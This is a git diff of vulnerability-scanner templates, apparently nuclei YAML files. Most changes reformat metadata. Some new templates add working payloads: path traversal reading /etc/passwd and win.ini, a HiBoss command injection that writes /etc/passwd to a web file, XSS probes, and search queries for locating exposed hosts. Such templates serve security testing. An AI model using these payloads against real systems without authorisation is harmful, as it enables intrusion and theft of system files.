"{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini" + - "{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" diff --git a/vulnerabilities/other/hashicorp-consul-rce.yaml b/vulnerabilities/other/hashicorp-consul-rce.yaml index 47a2da9817..b631c96023 100644 --- a/vulnerabilities/other/hashicorp-consul-rce.yaml +++ b/vulnerabilities/other/hashicorp-consul-rce.yaml @@ -4,7 +4,8 @@ info: name: Hashicorp Consul Services Api RCE author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/46074 + reference: + - https://www.exploit-db.com/exploits/46074 tags: hashicorp,rce,oast,intrusive requests: diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 00d5756dd4..8bc90128e4 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -1,12 +1,13 @@ id: hasura-graphql-psql-exec info: - author: Udyz name: Hasura GraphQL Engine - postgresql query exec + author: Udyz severity: critical description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint. - reference: https://www.exploit-db.com/exploits/49802 - tags: hasura,rce + reference: + - https://www.exploit-db.com/exploits/49802 + tags: hasura,rce,graphql requests: - raw: diff --git a/vulnerabilities/other/hasura-graphql-ssrf.yaml b/vulnerabilities/other/hasura-graphql-ssrf.yaml index ab8bbe4a7a..43771ef843 100644 --- a/vulnerabilities/other/hasura-graphql-ssrf.yaml +++ b/vulnerabilities/other/hasura-graphql-ssrf.yaml @@ -1,10 +1,12 @@ id: hasura-graphql-ssrf + info: name: Hasura GraphQL Engine - SSRF Side Request Forgery author: princechaddha severity: high - reference: https://cxsecurity.com/issue/WLB-2021040115 - tags: hasura,ssrf + reference: + - https://cxsecurity.com/issue/WLB-2021040115 + tags: hasura,ssrf,graphql requests: - raw: diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 10df9f9c37..6b90431fa1 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -5,26 +5,26 @@ info: author: pikpikcu severity: critical description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. - reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 + reference: + - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 tags: hiboss,rce requests: - raw: - | - GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 + GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{{randstr}}.txt&id=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - | - GET /poc.txt HTTP/1.1 + GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index a4301b8ce5..1e8a385c2d 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -4,7 +4,8 @@ info: name: HJTcloud Arbitrary File Read author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + reference: + - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw tags: hjtcloud,lfi requests: diff --git a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index 6641fa4b62..3d5c205fec 100644 --- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -4,7 +4,8 @@ info: name: HJTcloud Arbitrary file read author: pikpikcu severity: low - reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw + reference: + - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw tags: hjtcloud,lfi requests: diff --git a/vulnerabilities/other/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml index d41f1c89fb..539e6eb49d 100644 --- a/vulnerabilities/other/homeautomation-v3-openredirect.yaml +++ b/vulnerabilities/other/homeautomation-v3-openredirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: medium description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: diff --git a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index 93e24dde8d..eb3bfcfe28 100644 --- a/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -1,10 +1,12 @@ id: hrsale-unauthenticated-lfi + info: name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi author: 0x_Akoko severity: high description: This exploit allow you to download any readable file from server without permission and login session - reference: https://www.exploit-db.com/exploits/48920 + reference: + - https://www.exploit-db.com/exploits/48920 tags: hrsale,lfi requests: diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml index e968e2fd34..9848bc2218 100644 --- a/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index 8b2dc50919..1ab77f4a97 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -1,8 +1,11 @@ id: huijietong-cloud-fileread + info: name: Huijietong Cloud File Read - author: princechaddha + author: princechaddha,ritikchaddha severity: high + metadata: + fofa-query: body="/him/api/rest/v1.0/node/role" tags: huijietong,lfi requests: @@ -11,12 +14,19 @@ requests: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" body: 'fullPath=/etc/passwd' + - method: POST + path: + - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/Windows/win.ini' + matchers-condition: and matchers: - - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - type: status status: diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml index caa8758541..cf829fe9d3 100644 --- a/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -4,8 +4,9 @@ info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E requests: - raw: diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index ff2833281d..9386ffb3b2 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -4,7 +4,8 @@ info: name: Interlib Fileread author: pikpikcu severity: high - reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md tags: interlib,lfi requests: @@ -18,7 +19,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "for 16-bit app support" condition: or diff --git a/vulnerabilities/other/java-melody-xss.yaml b/vulnerabilities/other/java-melody-xss.yaml new file mode 100644 index 0000000000..efa41edf75 --- /dev/null +++ b/vulnerabilities/other/java-melody-xss.yaml @@ -0,0 +1,31 @@ +id: java-melody-xss + +info: + name: JavaMelody Monitoring - Cross-Site Scripting + author: kailashbohara + severity: medium + description: Reflected cross site scripting (XSS) in JavaMelody monitoring. + reference: + - https://github.com/Hurdano/JavaMelody-XSS + - https://github.com/javamelody/javamelody/pull/555 + tags: xss,javamelody + +requests: + - method: GET + path: + - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index a269c40da8..eb3fc80104 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml @@ -4,13 +4,14 @@ info: name: JEEWMS LFI author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g + reference: + - https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g tags: jeewms,lfi requests: - raw: - | #linux - GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 + GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -24,7 +25,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 95f977e802..ec0b342990 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -4,7 +4,8 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog requests: diff --git a/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/vulnerabilities/other/jinfornet-jreport-lfi.yaml new file mode 100644 index 0000000000..33c359624a --- /dev/null +++ b/vulnerabilities/other/jinfornet-jreport-lfi.yaml @@ -0,0 +1,28 @@ +id: jinfornet-jreport-lfi + +info: + name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal + author: 0x_Akoko + severity: high + description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. + This vulnerability affects Windows and Unix operating systems. + reference: + - https://cxsecurity.com/issue/WLB-2020030151 + - https://www.jinfonet.com/product/download-jreport/ + tags: jreport,jinfornet,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index 7ec3ae6352..e0cdd36ce7 100644 --- a/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -4,8 +4,9 @@ info: name: Joomla! com_fabrik 3.9.11 - Directory Traversal author: dhiyaneshDk severity: high + reference: + - https://www.exploit-db.com/exploits/48263 tags: joomla,lfi - reference: https://www.exploit-db.com/exploits/48263 requests: - method: GET diff --git a/vulnerabilities/other/kafdrop-xss.yaml b/vulnerabilities/other/kafdrop-xss.yaml index e7061938bd..32f69bbf74 100644 --- a/vulnerabilities/other/kafdrop-xss.yaml +++ b/vulnerabilities/other/kafdrop-xss.yaml @@ -1,12 +1,13 @@ id: kafdrop-xss info: - name: KafDrop XSS + name: KafDrop - Cross-Site Scripting author: dhiyaneshDk severity: medium + description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server. + reference: + - https://github.com/HomeAdvisor/Kafdrop/issues/12 tags: kafdrop,xss - description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server. - reference: https://github.com/HomeAdvisor/Kafdrop/issues/12 requests: - method: GET diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index ae79e71a41..867311d115 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -4,9 +4,12 @@ info: name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account author: gy741 severity: critical - description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php - tags: kevinlab + description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the + RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users + settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + tags: kevinlab,backdoor requests: - raw: diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 2f24495c6d..929f8c97cc 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -4,7 +4,8 @@ info: name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass author: gy741 severity: high - description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. + description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the + user or used in SQL queries. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php - https://www.exploit-db.com/exploits/50146 diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml index 7d4152fc83..525d27e4c1 100644 --- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -4,8 +4,11 @@ info: name: KevinLAB HEMS Undocumented Backdoor Account author: gy741 severity: critical - description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the + RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users + settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,default-login,backdoor requests: diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index 8397f21f07..6f73adfd83 100644 --- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -4,7 +4,8 @@ info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte severity: info - reference: https://cure53.de/pentest-report_keycloak.pdf + reference: + - https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss requests: diff --git a/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml new file mode 100644 index 0000000000..b11c6a4bbf --- /dev/null +++ b/vulnerabilities/other/kingdee-eas-directory-traversal.yaml @@ -0,0 +1,35 @@ +id: kingdee-eas-directory-traversal + +info: + name: Kingdee EAS - Directory Traversal + author: ritikchaddha + severity: medium + description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md + tags: kingdee,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix=" + - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix=" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"name":"Windows","path":"C:\\\\Windows","folder":true}' + - '{"name":"root","path":"/root","folder":true}' + condition: or + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/kingsoft-v8-file-read.yaml b/vulnerabilities/other/kingsoft-v8-file-read.yaml new file mode 100644 index 0000000000..a103be2311 --- /dev/null +++ b/vulnerabilities/other/kingsoft-v8-file-read.yaml @@ -0,0 +1,32 @@ +id: kingsoft-v8-file-read + +info: + name: Kingsoft V8 File Read + author: ritikchaddha + severity: high + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: kingsoft,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + - "[extensions]" + condition: and + + - type: word + part: header + words: + - "application/zip" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml new file mode 100644 index 0000000000..35651ada5b --- /dev/null +++ b/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -0,0 +1,26 @@ +id: kyocera-m2035dn-lfi + +info: + name: Kyocera Command Center RX ECOSYS M2035dn - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: Kyocera Command Center RX ECOSYS M2035dn - Unauthenticated arbitrary file retrieval. + reference: + - https://www.exploit-db.com/exploits/50738 + - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html + tags: printer,iot,kyocera,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/laravel-filemanager-lfi.yaml b/vulnerabilities/other/laravel-filemanager-lfi.yaml new file mode 100644 index 0000000000..d9287c7b90 --- /dev/null +++ b/vulnerabilities/other/laravel-filemanager-lfi.yaml @@ -0,0 +1,29 @@ +id: laravel-filemanager-lfi + +info: + name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read + author: hackerarpan + severity: high + reference: + - https://www.exploit-db.com/exploits/48166 + - https://github.com/UniSharp/laravel-filemanager + metadata: + google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io + shodan-query: http.html:"Laravel FileManager" + tags: lfi,unisharp,laravel,filemanager,fileupload,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/lotuscms-rce.yaml b/vulnerabilities/other/lotuscms-rce.yaml index e9cf4de15f..3092588555 100644 --- a/vulnerabilities/other/lotuscms-rce.yaml +++ b/vulnerabilities/other/lotuscms-rce.yaml @@ -4,7 +4,8 @@ info: name: LotusCMS 3.0 eval() RCE author: pikpikcu severity: critical - reference: https://github.com/Hood3dRob1n/LotusCMS-Exploit + reference: + - https://github.com/Hood3dRob1n/LotusCMS-Exploit tags: lotuscms,rce requests: diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 3fca056486..6993c365f5 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -4,9 +4,10 @@ info: name: Luftguitar CMS Arbitrary File Upload author: pikpikcu severity: high - tags: luftguitar description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. - reference: https://www.exploit-db.com/exploits/14991 + reference: + - https://www.exploit-db.com/exploits/14991 + tags: luftguitar requests: - method: GET diff --git a/vulnerabilities/other/maccmsv10-backdoor.yaml b/vulnerabilities/other/maccmsv10-backdoor.yaml index 249495b4ed..eaad3100fe 100644 --- a/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -1,4 +1,5 @@ id: maccmsv10-backdoor + info: name: Maccmsv10 Backdoor author: princechaddha diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml index 08cf21df8d..31412a5435 100644 --- a/vulnerabilities/other/magicflow-lfi.yaml +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. - reference: https://www.seebug.org/vuldb/ssvid-89258 + reference: + - https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi requests: @@ -19,7 +20,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index fca0ca4919..4628dea9d4 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -1,10 +1,12 @@ id: metinfo-lfi + info: name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - reference: https://paper.seebug.org/676/ description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content. + reference: + - https://paper.seebug.org/676/ tags: metinfo,lfi requests: diff --git a/vulnerabilities/other/microstrategy-ssrf.yaml b/vulnerabilities/other/microstrategy-ssrf.yaml index adfda438b6..df76c1a881 100644 --- a/vulnerabilities/other/microstrategy-ssrf.yaml +++ b/vulnerabilities/other/microstrategy-ssrf.yaml @@ -1,11 +1,12 @@ id: microstrategy-ssrf info: - name: MicroStrategy tinyurl - BSSRF + name: MicroStrategy tinyurl - Server-Side Request Forgery (Blind) author: organiccrap severity: high - description: Blind server-side request forgery vulnerability on MicroStrategy URL shortener. - reference: https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 + description: Blind server-side (SSRF) request forgery vulnerability on MicroStrategy URL shortener. + reference: + - https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204 tags: microstrategy,ssrf requests: diff --git a/vulnerabilities/other/microweber-xss.yaml b/vulnerabilities/other/microweber-xss.yaml new file mode 100644 index 0000000000..65c721fd33 --- /dev/null +++ b/vulnerabilities/other/microweber-xss.yaml @@ -0,0 +1,40 @@ +id: microweber-xss + +info: + name: Microweber Cross-Site Scripting + author: gy741 + severity: high + description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + reference: + - https://github.com/microweber/microweber/issues/809 + - https://github.com/microweber/microweber + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + metadata: + shodan-query: http.favicon.hash:780351152 + tags: microweber,xss,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/editor_tools/module?type=files/admin">¶ms=filetype=images#path=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '" 0="filetype=images"' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml index 22c5a7ef9a..4164b1a4cf 100644 --- a/vulnerabilities/other/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: high description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter. - reference: https://www.exploit-db.com/exploits/49744 + reference: + - https://www.exploit-db.com/exploits/49744 tags: minimouse,lfi requests: diff --git a/vulnerabilities/other/mpsec-lfi.yaml b/vulnerabilities/other/mpsec-lfi.yaml index b4eb79eedc..1bf2038934 100644 --- a/vulnerabilities/other/mpsec-lfi.yaml +++ b/vulnerabilities/other/mpsec-lfi.yaml @@ -4,7 +4,8 @@ info: name: MPSec ISG1000 Local File Read author: pikpikcu severity: high - reference: https://twitter.com/sec715/status/1402884871173795842 + reference: + - https://twitter.com/sec715/status/1402884871173795842 tags: mpsec,lfi requests: diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 0eac266103..c4cbfa7b17 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - tags: miscrsoft,exchange,owa,xss + tags: microsoft,exchange,owa,xss requests: - method: GET @@ 